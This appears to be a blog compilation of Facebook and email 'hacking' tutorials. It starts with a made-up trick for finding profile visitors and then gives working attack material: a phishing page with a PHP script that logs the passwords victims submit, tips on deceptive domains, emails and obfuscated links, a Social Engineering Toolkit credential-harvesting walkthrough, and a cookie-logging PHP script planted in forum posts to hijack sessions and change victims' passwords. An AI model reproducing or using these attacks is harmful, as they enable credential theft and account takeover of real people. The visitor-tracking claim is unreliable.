How To Trace Your Facebook Profile Visitors And Who Visit Your Profile Most

Do you want to know who visit you Facebook profile most and how to find all visitors list. This is a trick to trace your all profile visitors without any software and add-on. Facebook is a biggest social media along world wide. It is mainly act as a community. So peoples visit your profiles and get information from your account to confirm people is fake or not. Facebook store all visitors in hidden. It not shows public. So now i share how to find hidden code and reveal all your recent Facebook profile visitors. Please follow instruct to find Facebook visitors.

1. Log In your Facebook account.

2. Go to your Facebook Profile Page.

3. Now Press Ctrl + U from your keyboard for see source code of your profile page.




4. Now search (CTRL+F) for below code.
{"list":
There are some Facebook Profile Ids of your friends who visited recently.




The first one ID's are showing visits the most number of time.

5. If your want to find profile, Open a new tab on browser and paste below code on browser.

http://www.facebook.com/Facebook Profile Id

6. Replace RED color with ID on that page.

For Example: http://www.facebook.com/100002495205464

7. Press Enter key.

Done.

How to Hack Facebook Account Using Phishing webPage / How to Make Phishing webPage

Here, i am going to explain one of the popular social engineering attack(luring user to do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how to create a facebook phishing page.
Step 1:
Go to facebook and right click on website .  Select "View source" and copy the code to notepad.

The source of the page is displayed in the browser. Right click on the page and click on Save As. Save the page as index.html on your computer.

Step2:
Now search (Press ctrl +f) for keyword "action"  in that code.

You fill find the code like this:

 

Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php).  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.

Step 3:

Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.

Open the notepad and type the following code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "login.php"

Step 4:

Open the notepad and just save the file as "pswrds.txt" (without any contents).

Now our files are ready.Next step is to upload these files to any free web hosting site available on the internet. Google for free web hosting sites, select any one of them(I selected bytehost7), create an account with username as close to Facebook as possible and delete the index.html file available in the htdocs folder.Then using Online File Management upload your own index.html and phish.php files to the htdocs folder. Your htdocs folder will look like below.

 Let’s check if our phishing page is ready by typing the address of our site. If the page is like belowthen our phishing page is working.

The next thing we have to do is to send address of our fake website to the victim. We will do this through sending him an email but in order for the victim not to smell something fishy, we will obfuscate the url of the fake page we are about to send him. The sending email address should be as convincingly close to facebook as possible.

 When the victim clicks on the obfuscated url, it will bring him to our fake site.

 If the victim is not cautious enough as to observing the url and enters  his username and password, our attempt is a success. To show this, I will enter random values in both username field and password field and hit Enter.

Now a txt file with name pass.txt will be created in the htdocs folder containing both the username and the password.

 Click on the file. We can see both the email and the password i have entered. The email is “don’t get hacked” and the password is “like me”.

 Counter Point:

If you don’t want to fall victim to phishing, you can take a few precautions . If you want to open a site type the address directly in the url and don’t open any redirected links. Don’t click on any mails which look malicious like asking for your login credentials.

How To Hack Facebook Password Using Social Engineering Toolkit BackTrack

This Tutorial Is On SET. SET Is A Tool Which Is Used For Several Purposes. But In This Tutorial, I Will Explain How Can A Person Make Use Of This Tool For Stealing Passwords Of Facebook, Gmail Of Yahoo. This Tool Will Do Phishing. But You Dont Need To Waste Time For Making Phishing Scripts For Seperate Websites. This Tool Can Be Used For Much More Other Purposes Like Social Engineering Purposes, Harvesting, Cloning Etc. SET Is An Eploitation Tool. Keep Reading Below To Learn More About Phishing Through Social Engineering Toolkit(SET).

SET(Social Engineering Toolkit) In BackTrack 5R3

If You Are Using BackTrack. Then It Must Have SET In It Already. You Can Find It In Applications.
Applications>BackTrack>Exploitation Tools>Social Engineering Tools>Social Engineering Toolkit>Set

Now You Will Be Able To See SET Like Following.

Now Start Working.

1. After Opening SET, Type 1 For Social-Engineering Attacks And Hit Enter.
2. Now In This Step, Type 2 For Website Attack Vectors And Hit Enter.

3. Now Type 3 For Credential Harvester Attack Method And Press Enter.

4. Now In This Step, Type 2 For Site Cloner And Hit Enter.

5. Now Type Your IP In This Step And Press Enter.

Note: If You Dont Know Your IP. Then Open Terminal In BackTrack. Type ifconfig And Hit Enter. Copy IP From There And Paste In SET And Press Enter. Like I Copied inet addr. I Copied IP From wlan0. Because I Am Using Wireless Connection.

6. Now Type Any Website For Cloning And Press Enter. I Am Going To Use www.facebook.com

7. Wait And Press Enter When You See Screen Like Following Picture.

Now Its Time For Phishing. Give Your Ip Which You Used For Cloning To Victim. Make Him Convince That This Is Facebook And You Have To Sign In There. When The Victim Types His Username And Password And Press Enter. Bingo! Username And Password Will Be Shown On SET(Social Engineering Toolkit) Immediately. Watch Following Picture.

Victim Will Be Redirected To Login Page Again And Again. That's All. Subscribe Us For More Updates.

Hack FACEBOOK,GMAIL any account using cookie stealer

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.